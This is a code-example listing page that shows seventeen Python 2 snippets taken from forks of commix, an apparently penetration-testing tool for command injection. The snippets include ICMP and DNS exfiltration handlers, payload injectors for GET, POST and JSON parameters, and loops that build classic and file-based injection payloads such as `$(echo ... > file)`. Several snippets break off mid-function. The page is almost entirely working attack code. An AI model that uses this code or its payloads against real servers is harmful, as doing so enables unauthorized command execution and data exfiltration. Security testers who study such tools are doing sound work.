コード例 #1
0
ファイル: icmp_exfiltration.py プロジェクト: R3NW4/commix
def icmp_exfiltration_handler(url, http_request_method):
  # You need to have root privileges to run this script
  if os.geteuid() != 0:
    print "\n" + Back.RED + "(x) Error:  You need to have root privileges to run this option." + Style.RESET_ALL
    os._exit(0)

  if http_request_method == "GET":
    url = parameters.do_GET_check(url)
    vuln_parameter = parameters.vuln_GET_param(url)
    request = urllib2.Request(url)
    headers.do_check(request)
    
  else:
    parameter = menu.options.data
    parameter = urllib2.unquote(parameter)
    parameter = parameters.do_POST_check(parameter)
    request = urllib2.Request(url, parameter)
    headers.do_check(request)
    vuln_parameter = parameters.vuln_POST_param(parameter, url)
  
  # Check if defined any HTTP Proxy.
  if menu.options.proxy:
    try:
      response = proxy.use_proxy(request)
    except urllib2.HTTPError, err:
      print "\n" + Back.RED + "(x) Error: " + str(err) + Style.RESET_ALL
      os._exit(0)
コード例 #2
0
ファイル: icmp_exfiltration.py プロジェクト: hanshaze/commix
def icmp_exfiltration_handler(url, http_request_method):
  # You need to have root privileges to run this script
  if os.geteuid() != 0:
    print "\n" + Back.RED + settings.ERROR_SIGN + "You need to have root privileges to run this option." + Style.RESET_ALL
    os._exit(0)

  if http_request_method == "GET":
    #url = parameters.do_GET_check(url)
    vuln_parameter = parameters.vuln_GET_param(url)
    request = urllib2.Request(url)
    headers.do_check(request)
    
  else:
    parameter = menu.options.data
    parameter = urllib2.unquote(parameter)
    parameter = parameters.do_POST_check(parameter)
    request = urllib2.Request(url, parameter)
    headers.do_check(request)
    vuln_parameter = parameters.vuln_POST_param(parameter, url)
  
  # Check if defined any HTTP Proxy.
  if menu.options.proxy:
    try:
      response = proxy.use_proxy(request)
    except urllib2.HTTPError, err:
      if settings.IGNORE_ERR_MSG == False:
        print "\n" + Back.RED + settings.ERROR_SIGN + str(err) + Style.RESET_ALL
        continue_tests = checks.continue_tests(err)
        if continue_tests == True:
          settings.IGNORE_ERR_MSG = True
        else:
          os._exit(0)
コード例 #3
0
def icmp_exfiltration_handler(url,http_request_method):
  # You need to have root privileges to run this script
  if os.geteuid() != 0:
    print colors.BGRED + "\n(x) Error:  You need to have root privileges to run this option.\n" + colors.RESET
    sys.exit(0)

  if http_request_method == "GET":
    url = parameters.do_GET_check(url)
    vuln_parameter = parameters.vuln_GET_param(url)
    request = urllib2.Request(url)
    headers.do_check(request)
    
  else:
    parameter = menu.options.data
    parameter = urllib2.unquote(parameter)
    parameter = parameters.do_POST_check(parameter)
    request = urllib2.Request(url, parameter)
    headers.do_check(request)
    vuln_parameter = parameters.vuln_POST_param(parameter,url)
  
  # Check if defined any HTTP Proxy.
  if menu.options.proxy:
    try:
      proxy= urllib2.ProxyHandler({'http': menu.options.proxy})
      opener = urllib2.build_opener(proxy)
      urllib2.install_opener(opener)
      response = urllib2.urlopen(request)
    except urllib2.HTTPError, err:
      print "\n" + colors.BGRED + "(x) Error : " + str(err) + colors.RESET
      sys.exit(1) 
コード例 #4
0
ファイル: fb_injector.py プロジェクト: jamesshew/commix
def injection_test(payload, http_request_method, url):
                      
  # Check if defined method is GET (Default).
  if http_request_method == "GET":
    
    # Check if its not specified the 'INJECT_HERE' tag
    #url = parameters.do_GET_check(url)
    
    # Encoding spaces.
    payload = payload.replace(" ","%20")
    
    # Define the vulnerable parameter
    vuln_parameter = parameters.vuln_GET_param(url)
    
    target = re.sub(settings.INJECT_TAG, payload, url)
    request = urllib2.Request(target)
    
    # Check if defined extra headers.
    headers.do_check(request)
    
    try:
      # Get the response of the request
      response = get_request_response(request)
    except KeyboardInterrupt:
      response = None

  # Check if defined method is POST.
  else:
    parameter = menu.options.data
    parameter = urllib2.unquote(parameter)
    
    # Check if its not specified the 'INJECT_HERE' tag
    parameter = parameters.do_POST_check(parameter)

    # Define the POST data  
    if settings.IS_JSON == False:
      data = re.sub(settings.INJECT_TAG, payload, parameter)
      request = urllib2.Request(url, data)
    else:
      payload = payload.replace("\"", "\\\"")
      data = re.sub(settings.INJECT_TAG, urllib.unquote(payload), parameter)
      try:
        data = json.loads(data, strict = False)
      except:
        pass
      request = urllib2.Request(url, json.dumps(data))

    # Check if defined extra headers.
    headers.do_check(request)

    # Define the vulnerable parameter
    vuln_parameter = parameters.vuln_POST_param(parameter, url)
    
    try:
      # Get the response of the request
      response = get_request_response(request)
    except KeyboardInterrupt:
      response = None

  return response, vuln_parameter
コード例 #5
0
ファイル: tfb_injector.py プロジェクト: jack51706/commix
def injection_test(payload, http_request_method, url):
  start = 0
  end = 0
  start = time.time()
  
  # Check if defined method is GET (Default).
  if http_request_method == "GET":
    
    # Check if its not specified the 'INJECT_HERE' tag
    #url = parameters.do_GET_check(url)
    
    # Encoding non-ASCII characters payload.
    payload = urllib.quote(payload)
    
    # Define the vulnerable parameter
    vuln_parameter = parameters.vuln_GET_param(url)
      
    target = re.sub(settings.INJECT_TAG, payload, url)
    request = urllib2.Request(target)
    
    # Check if defined extra headers.
    headers.do_check(request)
    
    # Get the response of the request
    response = get_request_response(request)

  # Check if defined method is POST.
  else:
    parameter = menu.options.data
    parameter = urllib2.unquote(parameter)
    
    # Check if its not specified the 'INJECT_HERE' tag
    parameter = parameters.do_POST_check(parameter)
    
    # Define the vulnerable parameter
    vuln_parameter = parameters.vuln_POST_param(parameter, url)
    
    # Define the POST data   
    if settings.IS_JSON == False:
      data = re.sub(settings.INJECT_TAG, payload, parameter)
      request = urllib2.Request(url, data)
    else:
      payload = payload.replace("\"", "\\\"")
      data = re.sub(settings.INJECT_TAG, urllib.unquote(payload), parameter)
      data = json.loads(data, strict = False)
      request = urllib2.Request(url, json.dumps(data))
    
    # Check if defined extra headers.
    headers.do_check(request)
    
    # Get the response of the request
    response = get_request_response(request)

  end  = time.time()
  how_long = int(end - start)

  return how_long, vuln_parameter
コード例 #6
0
ファイル: controller.py プロジェクト: HugoDelval/commix
def post_request(url, http_request_method, filename, delay):

  # Check if HTTP Method is POST.
  parameter = menu.options.data
  found_parameter = parameters.do_POST_check(parameter)

  # Check if singe entry parameter
  if type(found_parameter) is str:
    found_parameter_list = []
    found_parameter_list.append(found_parameter)
    found_parameter = found_parameter_list

  # Remove whitespaces   
  found_parameter = [x.replace(" ", "") for x in found_parameter]

  # Check if multiple parameters
  check_parameters = []
  for i in range(0, len(found_parameter)):
    parameter = menu.options.data = found_parameter[i]
    check_parameter = parameters.vuln_POST_param(parameter, url)
    check_parameters.append(check_parameter)

  #if not menu.options.level > 1:
  header_name = ""
  checks.print_non_listed_params(check_parameters, http_request_method, header_name)

  for i in range(0, len(found_parameter)):
    parameter = menu.options.data = found_parameter[i]
    check_parameter = parameters.vuln_POST_param(parameter, url)
    if len(check_parameter) > 0:
      settings.TESTABLE_PARAMETER = check_parameter
    # Check if testable parameter(s) are provided
    if len(settings.TEST_PARAMETER) > 0:
      if check_parameter in settings.TEST_PARAMETER:
        # Check for session file 
        check_for_stored_sessions(url, http_request_method)
        injection_proccess(url, check_parameter, http_request_method, filename, delay)
    else:
      # Check for session file 
      check_for_stored_sessions(url, http_request_method)
      injection_proccess(url, check_parameter, http_request_method, filename, delay)
コード例 #7
0
ファイル: cb_injector.py プロジェクト: security-geeks/commix
def injection_test(payload, http_request_method, url):       

  # Check if defined method is GET (Default).
  if http_request_method == "GET":
    if " " in payload:
      payload = payload.replace(" ","%20")
    # Define the vulnerable parameter
    vuln_parameter = parameters.vuln_GET_param(url)
    target = url.replace(settings.INJECT_TAG, payload)
    request = urllib2.Request(target)
    
    # Check if defined extra headers.
    headers.do_check(request)

    # Get the response of the request.
    response = requests.get_request_response(request)

  # Check if defined method is POST.
  else:
    parameter = menu.options.data
    parameter = urllib2.unquote(parameter)
    
    # Check if its not specified the 'INJECT_HERE' tag
    parameter = parameters.do_POST_check(parameter)
    parameter = parameter.replace("+","%2B")

    # Define the POST data 
    if settings.IS_JSON:
      payload = payload.replace("\"", "\\\"")
      data = parameter.replace(settings.INJECT_TAG, urllib.unquote(payload))
      try:
        data = json.loads(data, strict = False)
      except:
        pass
      request = urllib2.Request(url, json.dumps(data))
    else:
      if settings.IS_XML:
        data = parameter.replace(settings.INJECT_TAG, urllib.unquote(payload))  
      else:
        data = parameter.replace(settings.INJECT_TAG, payload)
      request = urllib2.Request(url, data)
    
    # Check if defined extra headers.
    headers.do_check(request)
    
    # Define the vulnerable parameter
    vuln_parameter = parameters.vuln_POST_param(parameter, url)

    # Get the response of the request.
    response = requests.get_request_response(request)

  return response, vuln_parameter
コード例 #8
0
ファイル: tb_injector.py プロジェクト: ROIXppttdr/commix
def injection_test(payload, http_request_method, url):
  
  start = 0
  end = 0
  start = time.time()
  
  # Check if defined method is GET (Default).
  if http_request_method == "GET":
    
    # Check if its not specified the 'INJECT_HERE' tag
    #url = parameters.do_GET_check(url)
    
    # Encoding non-ASCII characters payload.
    payload = urllib.quote(payload)
    
    # Define the vulnerable parameter
    vuln_parameter = parameters.vuln_GET_param(url)
      
    target = re.sub(settings.INJECT_TAG, payload, url)
    request = urllib2.Request(target)
              
  # Check if defined method is POST.
  else:
    parameter = menu.options.data
    parameter = urllib2.unquote(parameter)
    
    # Check if its not specified the 'INJECT_HERE' tag
    parameter = parameters.do_POST_check(parameter)
    
    # Define the vulnerable parameter
    vuln_parameter = parameters.vuln_POST_param(parameter, url)
    
    # Define the POST data   
    if settings.IS_JSON == False:
      data = re.sub(settings.INJECT_TAG, payload, parameter)
      request = urllib2.Request(url, data)
    else:
      payload = payload.replace("\"", "\\\"")
      data = re.sub(settings.INJECT_TAG, urllib.unquote(payload), parameter)
      data = json.loads(data, strict = False)
      request = urllib2.Request(url, json.dumps(data))
    
  # Check if defined extra headers.
  headers.do_check(request)
  
  # Check if defined any HTTP Proxy.
  if menu.options.proxy:
    try:
      response = proxy.use_proxy(request)
    except urllib2.HTTPError, err:
      print "\n" + Back.RED + "(x) Error: " + str(err) + Style.RESET_ALL
      raise SystemExit() 
コード例 #9
0
ファイル: classic.py プロジェクト: jdalessandro/commix
def icmp_exfiltration_handler(url,http_request_method):
  
  # You need to have root privileges to run this script
  if os.geteuid() != 0:
    print colors.RED + "\n(x) Error:  You need to have root privileges to run this option.\n" + colors.RESET
    sys.exit(0)
    
  if http_request_method == "GET":
    # Check if its not specified the 'INJECT_HERE' tag
    url = parameters.do_GET_check(url)
    
    # Define the vulnerable parameter
    vuln_parameter = parameters.vuln_GET_param(url)
    request_data = vuln_parameter

  else:
    parameter = menu.options.data
    parameter = urllib2.unquote(parameter)
    
    # Check if its not specified the 'INJECT_HERE' tag
    parameter = parameters.do_POST_check(parameter)
    
    # Define the vulnerable parameter
    vuln_parameter = parameters.vuln_POST_param(parameter,url)
    request_data = vuln_parameter
    
  ip_data = menu.options.ip_icmp_data
  
  # Load the module ICMP_Exfiltration
  
  try:
    from src.core.modules import ICMP_Exfiltration
    
  except ImportError as e:
    print colors.RED + "(x) Error:", e
    print colors.RESET
    sys.exit(1)
    
  technique = "ICMP exfiltration technique"
  sys.stdout.write( colors.BOLD + "(*) Testing the "+ technique + "... \n" + colors.RESET)
  sys.stdout.flush()
  
  ip_src =  re.findall(r"ip_src=(.*),", ip_data)
  ip_src = ''.join(ip_src)
  
  ip_dst =  re.findall(r"ip_dst=(.*)", ip_data)
  ip_dst = ''.join(ip_dst)
  
  ICMP_Exfiltration.exploitation(ip_dst,ip_src,url,http_request_method,request_data)
コード例 #10
0
ファイル: cb_injector.py プロジェクト: TheNameIsNigel/commix
def injection_test(payload,http_request_method,url):
  		    
  # Check if defined method is GET (Default).
  if http_request_method == "GET":
    # Check if its not specified the 'INJECT_HERE' tag
    url = parameters.do_GET_check(url)
    
    # Define the vulnerable parameter
    vuln_parameter = parameters.vuln_GET_param(url)
    target = re.sub(settings.INJECT_TAG, payload, url)
    request = urllib2.Request(target)
    
    # Check if defined extra headers.
    headers.do_check(request)
      
  # Check if defined method is POST.
  else:
    parameter = menu.options.data
    parameter = urllib2.unquote(parameter)
    
    # Check if its not specified the 'INJECT_HERE' tag
    parameter = parameters.do_POST_check(parameter)
    
    # Define the POST data
    data = re.sub(settings.INJECT_TAG, payload, parameter)
    request = urllib2.Request(url, data)
    
    # Check if defined extra headers.
    headers.do_check(request)
    
    # Define the vulnerable parameter
    vuln_parameter = parameters.vuln_POST_param(parameter,url)
  
  # Check if defined any HTTP Proxy.
  if menu.options.proxy:
    try:
      proxy= urllib2.ProxyHandler({'http': menu.options.proxy})
      opener = urllib2.build_opener(proxy)
      urllib2.install_opener(opener)
      response = urllib2.urlopen(request)
    except urllib2.HTTPError, err:
      print "\n" + colors.BGRED + "(x) Error : " + str(err) + colors.RESET
      sys.exit(1) 
コード例 #11
0
def dns_exfiltration_handler(url, http_request_method):
  # Check injection state
  settings.DETECTION_PHASE = True
  settings.EXPLOITATION_PHASE = False
  # You need to have root privileges to run this script
  if os.geteuid() != 0:
    err_msg = "You need to have root privileges to run this option."
    print "\n" + settings.print_critical_msg(err_msg)
    os._exit(0)

  if http_request_method == "GET":
    #url = parameters.do_GET_check(url)
    vuln_parameter = parameters.vuln_GET_param(url)
    request = urllib2.Request(url)
    headers.do_check(request)
    
  else:
    parameter = menu.options.data
    parameter = urllib2.unquote(parameter)
    parameter = parameters.do_POST_check(parameter)
    request = urllib2.Request(url, parameter)
    headers.do_check(request)
    vuln_parameter = parameters.vuln_POST_param(parameter, url)
  
  # Check if defined any HTTP Proxy.
  if menu.options.proxy:
    try:
      response = proxy.use_proxy(request)
    except urllib2.HTTPError, err_msg:
      if str(err_msg.code) == settings.INTERNAL_SERVER_ERROR:
        response = False  
      elif settings.IGNORE_ERR_MSG == False:
        err = str(err_msg) + "."
        print "\n" + settings.print_critical_msg(err)
        continue_tests = checks.continue_tests(err_msg)
        if continue_tests == True:
          settings.IGNORE_ERR_MSG = True
        else:
          os._exit(0)
コード例 #12
0
def icmp_exfiltration_handler(url, http_request_method):
    # Check injection state
    settings.DETECTION_PHASE = True
    settings.EXPLOITATION_PHASE = False
    # You need to have root privileges to run this script
    if os.geteuid() != 0:
        err_msg = "You need to have root privileges to run this option."
        print settings.print_critical_msg(err_msg) + "\n"
        os._exit(0)

    if http_request_method == "GET":
        #url = parameters.do_GET_check(url)
        request = urllib2.Request(url)
        headers.do_check(request)
        vuln_parameter = parameters.vuln_GET_param(url)

    else:
        parameter = menu.options.data
        parameter = urllib2.unquote(parameter)
        parameter = parameters.do_POST_check(parameter)
        request = urllib2.Request(url, parameter)
        headers.do_check(request)
        vuln_parameter = parameters.vuln_POST_param(parameter, url)

    # Check if defined any HTTP Proxy.
    if menu.options.proxy:
        try:
            response = proxy.use_proxy(request)
        except urllib2.HTTPError, err_msg:
            if str(err_msg.code) == settings.INTERNAL_SERVER_ERROR:
                response = False
            elif settings.IGNORE_ERR_MSG == False:
                err = str(err_msg) + "."
                print "\n" + settings.print_critical_msg(err)
                continue_tests = checks.continue_tests(err_msg)
                if continue_tests == True:
                    settings.IGNORE_ERR_MSG = True
                else:
                    os._exit(0)
コード例 #13
0
    else:
        parameter = menu.options.data
        parameter = urllib2.unquote(parameter)

        # Check if its not specified the 'INJECT_HERE' tag
        parameter = parameters.do_POST_check(parameter)

        # Define the POST data
        data = re.sub(settings.INJECT_TAG, payload, parameter)
        request = urllib2.Request(url, data)

        # Check if defined extra headers.
        headers.do_check(request)

        # Define the vulnerable parameter
        vuln_parameter = parameters.vuln_POST_param(parameter, url)

        # Check if defined any HTTP Proxy.
        if menu.options.proxy:
            try:
                response = proxy.use_proxy(request)
            except urllib2.HTTPError, err:
                print "\n" + Back.RED + "(x) Error : " + str(
                    err) + Style.RESET_ALL
                raise SystemExit()

        # Check if defined Tor.
        elif menu.options.tor:
            try:
                response = tor.use_tor(request)
            except urllib2.HTTPError, err:
コード例 #14
0
ファイル: file_based.py プロジェクト: jdalessandro/commix
def exploitation(url,delay,filename,http_request_method):

  counter = 0
  vp_flag = True
  no_result = True
  is_encoded= False
  stop_injection = False
  injection_type = "Semiblind-based Command Injection"
  technique = "file-based semiblind injection technique"
  
  sys.stdout.write( colors.BOLD + "(*) Testing the "+ technique + "... " + colors.RESET)
  sys.stdout.flush()
  
  # Print the findings to log file.
  output_file = open(filename + ".txt", "a")
  output_file.write("\n---")
  output_file.write("\n(+) Type : " + injection_type)
  output_file.write("\n(+) Technique : " + technique.title())
  output_file.close()
    
  for prefix in settings.PREFIXES:
    for suffix in settings.SUFFIXES:
      for seperator in settings.SEPERATORS:
	
	# Check for bad combination of prefix and seperator
	combination = prefix + seperator
	if combination in settings.JUNK_COMBINATION:
	  prefix = ""
	
	# Change TAG on every request to prevent false-positive resutls.
	TAG = ''.join(random.choice(string.ascii_uppercase) for i in range(6))  
	
	# Check if defined "--base64" option.
	if menu.options.base64_trick == True:
	  B64_ENC_TAG = base64.b64encode(TAG)
	  B64_DEC_TRICK = settings.B64_DEC_TRICK
	else:
	  B64_ENC_TAG = TAG
	  B64_DEC_TRICK = ""
	  
	# The output file for file-based injection technique.
	OUTPUT_TEXTFILE = B64_ENC_TAG + ".txt"
	
	sys.stdout.write( "\n(*) Trying to upload the '"+ OUTPUT_TEXTFILE +"' on "+settings.SRV_ROOT_DIR+"... ")
	try:
	  payload = (seperator + " " +
		    "$(echo '" + B64_ENC_TAG + "'" + B64_DEC_TRICK + " >" + OUTPUT_TEXTFILE + ")"
		      ) 
		  
	  # Check if defined "--prefix" option.
	  if menu.options.prefix:
	    prefix = menu.options.prefix
	    payload = prefix + payload
	  else:
	    payload = prefix + payload
	    
	  # Check if defined "--suffix" option.
	  if menu.options.suffix:
	    suffix = menu.options.suffix
	    payload = payload + suffix
	  else:
	    payload = payload + suffix

	  #Check if defined "--verbose" option.
	  if menu.options.verbose:
	    sys.stdout.write("\n" + colors.GREY + payload + colors.RESET)
	  
	  # Check if defined method is GET (Default).
	  if http_request_method == "GET":
	    
	    # Check if its not specified the 'INJECT_HERE' tag
	    url = parameters.do_GET_check(url)
	    
	    # Encoding non-ASCII characters payload.
	    payload = urllib.quote(payload)
	    
	    # Define the vulnerable parameter
	    vuln_parameter = parameters.vuln_GET_param(url)
	    
	    target = re.sub(settings.INJECT_TAG, payload, url)
	    request = urllib2.Request(target)
	    
	    # Check if defined extra headers.
	    headers.do_check(request)

	    # Check if defined any HTTP Proxy.
	    if menu.options.proxy:
	      try:
		proxy= urllib2.ProxyHandler({'http': menu.options.proxy})
		opener = urllib2.build_opener(proxy)
		urllib2.install_opener(opener)
		response = urllib2.urlopen(request)
		
	      except urllib2.HTTPError, err:
		print "\n(x) Error : " + str(err)
		sys.exit(1) 
	
	    else:
	      response = urllib2.urlopen(request)
	      
	  # Check if defined method is POST.
	  else:
	    parameter = menu.options.data
	    parameter = urllib2.unquote(parameter)
	    
	    # Check if its not specified the 'INJECT_HERE' tag
	    parameter = parameters.do_POST_check(parameter)
	    
	    # Define the POST data
	    data = re.sub(settings.INJECT_TAG, payload, parameter)
	    request = urllib2.Request(url, data)
	    
	    # Define the vulnerable parameter
	    vuln_parameter = parameters.vuln_POST_param(parameter,url)
	    
	    # Check if defined extra headers.
	    headers.do_check(request)

	    # Check if defined any HTTP Proxy.
	    if menu.options.proxy:
	      try:
		proxy= urllib2.ProxyHandler({'http': menu.options.proxy})
		opener = urllib2.build_opener(proxy)
		urllib2.install_opener(opener)
		response = urllib2.urlopen(request)
			      
	      except urllib2.HTTPError, err:
		print "\n(x) Error : " + str(err)
		sys.exit(1) 
	
	    else:
	      response = urllib2.urlopen(request)
	      
	  # Find the directory.
	  path = url
	  path_parts = path.split('/')
	  count = 0
	  for part in path_parts:	
	    count = count + 1
	  count = count - 1
	  last_param = path_parts[count]
	  output = url.replace(last_param,OUTPUT_TEXTFILE)
	  time.sleep(delay)
	  
	  try:
	    output = urllib2.urlopen(output)
	    html_data = output.read()
	  
	  # If temp-based attack failed, 
	  # use /tmp/ directory for temp-based.
	  except urllib2.HTTPError, e:
	      if e.getcode() == 404:
		
		stop_injection = False
		if menu.options.tmp_path:
		  tmp_path = menu.options.tmp_path
		else:
		  tmp_path = settings.TMP_PATH
		print colors.BOLD + colors.RED + "\n(x) Error: Unable to upload the '"+ OUTPUT_TEXTFILE +"' on '" + settings.SRV_ROOT_DIR + "'." + colors.RESET
		sys.stdout.write("(*) Trying to upload the '"+ OUTPUT_TEXTFILE +"' on temporary directory (" + tmp_path + ")...\n")
		tempfile_based.exploitation(url,delay,filename,tmp_path,http_request_method)     
		sys.exit(0)
コード例 #15
0
def post_request(url, http_request_method, filename, timesec):

    # Check if HTTP Method is POST.
    parameter = menu.options.data
    found_parameter = parameters.do_POST_check(parameter)

    # Check if singe entry parameter
    if type(found_parameter) is str:
        found_parameter_list = []
        found_parameter_list.append(found_parameter)
        found_parameter = found_parameter_list

    # Remove whitespaces
    found_parameter = [x.replace(" ", "") for x in found_parameter]

    # Check if multiple parameters
    check_parameters = []
    for i in range(0, len(found_parameter)):
        parameter = menu.options.data = found_parameter[i]
        check_parameter = parameters.vuln_POST_param(parameter, url)
        check_parameters.append(check_parameter)

    header_name = ""
    checks.print_non_listed_params(check_parameters, http_request_method,
                                   header_name)

    for i in range(0, len(found_parameter)):
        parameter = menu.options.data = found_parameter[i]
        check_parameter = parameters.vuln_POST_param(parameter, url)
        if check_parameter != parameter:
            if len(check_parameter) > 0:
                settings.TESTABLE_PARAMETER = check_parameter

            # Check if testable parameter(s) are provided
            if len(settings.TESTABLE_PARAMETER) > 0:
                if menu.options.test_parameter != None:
                    param_counter = 0
                    for check_parameter in check_parameters:
                        if check_parameter in "".join(
                                settings.TEST_PARAMETER).split(","):
                            menu.options.data = found_parameter[param_counter]
                            check_for_stored_sessions(url, http_request_method)
                            injection_proccess(url, check_parameter,
                                               http_request_method, filename,
                                               timesec)
                        param_counter += 1
                    break
                else:
                    # Check for session file
                    check_for_stored_sessions(url, http_request_method)
                    injection_proccess(url, check_parameter,
                                       http_request_method, filename, timesec)
            else:
                # Check for session file
                check_for_stored_sessions(url, http_request_method)
                injection_proccess(url, check_parameter, http_request_method,
                                   filename, timesec)

    # Enable Cookie Injection
    if menu.options.level > settings.DEFAULT_INJECTION_LEVEL and menu.options.cookie:
        settings.COOKIE_INJECTION = True
コード例 #16
0
ファイル: classic.py プロジェクト: jdalessandro/commix
def classic_exploitation_handler(url,delay,filename,http_request_method):
  
  counter = 0
  vp_flag = True
  no_result = True
  is_encoded= False
  injection_type = "Results-based Command Injection"
  technique = "classic injection technique"
      
  sys.stdout.write( colors.BOLD + "(*) Testing the "+ technique + "... " + colors.RESET)
  sys.stdout.flush()
  
  # Print the findings to log file.
  output_file = open(filename + ".txt", "a")
  output_file.write("\n---")
  output_file.write("\n(+) Type : " + injection_type)
  output_file.write("\n(+) Technique : " + technique.title())
  output_file.close()
  
  for whitespace in settings.WHITESPACES:
    for prefix in settings.PREFIXES:
      for suffix in settings.SUFFIXES:
	for seperator in settings.SEPERATORS:
	  
	  # Check for bad combination of prefix and seperator
	  combination = prefix + seperator
	  if combination in settings.JUNK_COMBINATION:
	    prefix = ""

	  # Change TAG on every request to prevent false-positive resutls.
	  TAG = ''.join(random.choice(string.ascii_uppercase) for i in range(6))  
	  
	  # Check if defined "--base64" option.
	  if menu.options.base64_trick == True:
	    B64_ENC_TAG = base64.b64encode(TAG)
	    B64_DEC_TRICK = settings.B64_DEC_TRICK
	  else:
	    B64_ENC_TAG = TAG
	    B64_DEC_TRICK = ""
	    
	  try:
	    payload = (seperator + 
		      "echo '" + TAG + "'" +
		      "$(echo '" + B64_ENC_TAG + "'" + B64_DEC_TRICK + ")'" + TAG + "'"
			) 
			    
	    # Check if defined "--prefix" option.
	    if menu.options.prefix:
	      prefix = menu.options.prefix
	      payload = prefix + payload
	      
	    else:
	      payload = prefix + payload
	      
	    # Check if defined "--suffix" option.
	    if menu.options.suffix:
	      suffix = menu.options.suffix
	      payload = payload + suffix
	      
	    else:
	      payload = payload + suffix

	    if seperator == " " :
	      payload = re.sub(" ", "%20", payload)
	    else:
	      payload = re.sub(" ", whitespace, payload)

	    #Check if defined "--verbose" option.
	    if menu.options.verbose:
	      sys.stdout.write("\n" + colors.GREY + payload + colors.RESET)
	    
	    # Check if defined method is GET (Default).
	    if http_request_method == "GET":
	      
	      # Check if its not specified the 'INJECT_HERE' tag
	      url = parameters.do_GET_check(url)
	      
	      # Define the vulnerable parameter
	      vuln_parameter = parameters.vuln_GET_param(url)

	      target = re.sub(settings.INJECT_TAG, payload, url)
	      request = urllib2.Request(target)

	      # Check if defined extra headers.
	      headers.do_check(request)

	      # Check if defined any HTTP Proxy.
	      if menu.options.proxy:
		try:
		  proxy= urllib2.ProxyHandler({'http': menu.options.proxy})
		  opener = urllib2.build_opener(proxy)
		  urllib2.install_opener(opener)
		  response = urllib2.urlopen(request)
		  
		except urllib2.HTTPError, err:
		  print "\n(x) Error : " + str(err)
		  sys.exit(1) 
	  
	      else:
		response = urllib2.urlopen(request)
		
	    # Check if defined method is POST.
	    else:
	      parameter = menu.options.data
	      parameter = urllib2.unquote(parameter)
	      
	      # Check if its not specified the 'INJECT_HERE' tag
	      parameter = parameters.do_POST_check(parameter)
	      
	      # Define the POST data
	      data = re.sub(settings.INJECT_TAG, payload, parameter)
	      request = urllib2.Request(url, data)
	      
	      # Define the vulnerable parameter
	      vuln_parameter = parameters.vuln_POST_param(parameter,url)
	      
	      # Check if defined extra headers.
	      headers.do_check(request)

	      # Check if defined any HTTP Proxy.
	      if menu.options.proxy:
		try:
		  proxy= urllib2.ProxyHandler({'http': menu.options.proxy})
		  opener = urllib2.build_opener(proxy)
		  urllib2.install_opener(opener)
		  response = urllib2.urlopen(request)
				
		except urllib2.HTTPError, err:
		  print "\n(x) Error : " + str(err)
		  sys.exit(1) 
	  
	      else:
		response = urllib2.urlopen(request)
		  
	    # if need page reload
	    if menu.options.url_reload: 
	      time.sleep(delay)
	      response = urllib.urlopen(url)
	      
	    html_data = response.read()
	    shell = re.findall(r""+TAG+TAG+TAG+"", html_data)
	    
	  except:
コード例 #17
0
ファイル: controller.py プロジェクト: stewart-jimmee/commix
def do_check(url, filename):

  classic_state = False
  eval_based_state = False
  time_based_state = False
  file_based_state = False

  # Check if defined "--delay" option.
  if menu.options.delay:
    delay = menu.options.delay
  else:
    delay = settings.DELAY

  # Do authentication if needed.
  if menu.options.auth_url and menu.options.auth_data:
    authentication.auth_process()      
  elif menu.options.auth_url or menu.options.auth_data: 
    print Back.RED + "(x) Error: You must specify both login panel URL and login parameters.\n" + Style.RESET_ALL
    sys.exit(0)
  else:
    pass
  
  # Check if HTTP Method is GET or POST.
  header_name = ""
  if not menu.options.data:
    http_request_method = "GET"
    check_parameter  = parameters.vuln_GET_param(url)
    the_type = " parameter "

  else:
    http_request_method = "POST"
    parameter = menu.options.data
    check_parameter = parameters.vuln_POST_param(parameter, url)
    the_type = " parameter " 

  # Load modules
  modules_handler.load_modules(url, http_request_method, filename)

  # Cookie Injection
  if settings.COOKIE_INJECTION == True:
    header_name = " Cookie"
    check_parameter  = parameters.specify_cookie_parameter(menu.options.cookie)
    the_type = " HTTP header "
            
  # User-Agent Injection
  elif settings.USER_AGENT_INJECTION == True:
    header_name = " User-Agent"
    check_parameter  = ""
    the_type = " HTTP header "

  # Referer Injection
  elif settings.REFERER_INJECTION == True:
    header_name = " Referer"
    check_parameter  = ""
    the_type = " HTTP header "

  else : 
    pass

  if len(check_parameter) != 0 :
    check_parameter = " '" + check_parameter + "'"

  print "(*) Setting the " + "(" + http_request_method + ")" + check_parameter + header_name + the_type + "for tests."

  # Estimating the response time (in seconds)
  delay, url_time_response = requests.estimate_response_time(url, delay)

  # Check all injection techniques
  if not menu.options.tech:
    # Check if it is vulnerable to classic command injection technique.
    if cb_handler.exploitation(url, delay, filename, http_request_method) != False:
      classic_state = True

    # Check if it is vulnerable to eval-based command injection technique.
    if eb_handler.exploitation(url, delay, filename, http_request_method) != False:
      eval_based_state = True

    # Check if it is vulnerable to time-based blind command injection technique.
    if tb_handler.exploitation(url, delay, filename, http_request_method, url_time_response) != False:
      time_based_state = True

    # Check if it is vulnerable to file-based semiblind command injection technique.
    if fb_handler.exploitation(url, delay, filename, http_request_method, url_time_response) != False:
      file_based_state = True

  else:
    # Check if it is vulnerable to classic command injection technique.
    if "classic" in menu.options.tech or len(menu.options.tech) <= 4 and "c" in menu.options.tech:
      # Check if classic results-based command injection technique succeeds.
      if cb_handler.exploitation(url, delay, filename, http_request_method) != False:
        classic_state = True
    elif menu.options.tech == "classic":
      cb_handler.exploitation(url, delay, filename, http_request_method)
    else:
      classic_state = False

    # Check if it is vulnerable to eval-based command injection technique.
    if "eval-based" in menu.options.tech or len(menu.options.tech) <= 4 and "e" in menu.options.tech:
      # Check if eval-based command injection technique succeeds.
      if eb_handler.exploitation(url, delay, filename, http_request_method) != False:
        eval_based_state = True
    elif menu.options.tech == "eval-based":
      eb_handler.exploitation(url, delay, filename, http_request_method)
    else:
      eval_based_state = False

    # Check if it is vulnerable to time-based blind command injection technique.
    if "time-based" in menu.options.tech or len(menu.options.tech) <= 4 and "t" in menu.options.tech:
      # Check if time-based blind command injection technique succeeds.
      if tb_handler.exploitation(url, delay, filename, http_request_method, url_time_response) != False:
        time_based_state = True
    elif menu.options.tech == "time-based":
      tb_handler.exploitation(url, delay, filename, http_request_method, url_time_response)
    else:
      time_based_state = False

    # Check if it is vulnerable to file-based semiblind command injection technique.
    if "file-based" in menu.options.tech or len(menu.options.tech) <= 4 and "f" in menu.options.tech:
       # Check if file-based semiblind command injection technique succeeds.
      if fb_handler.exploitation(url, delay, filename, http_request_method, url_time_response) != False:
        file_based_state = True
    elif menu.options.tech == "file-based":
      fb_handler.exploitation(url, delay, filename, http_request_method, url_time_response)
    else:
      file_based_state = False

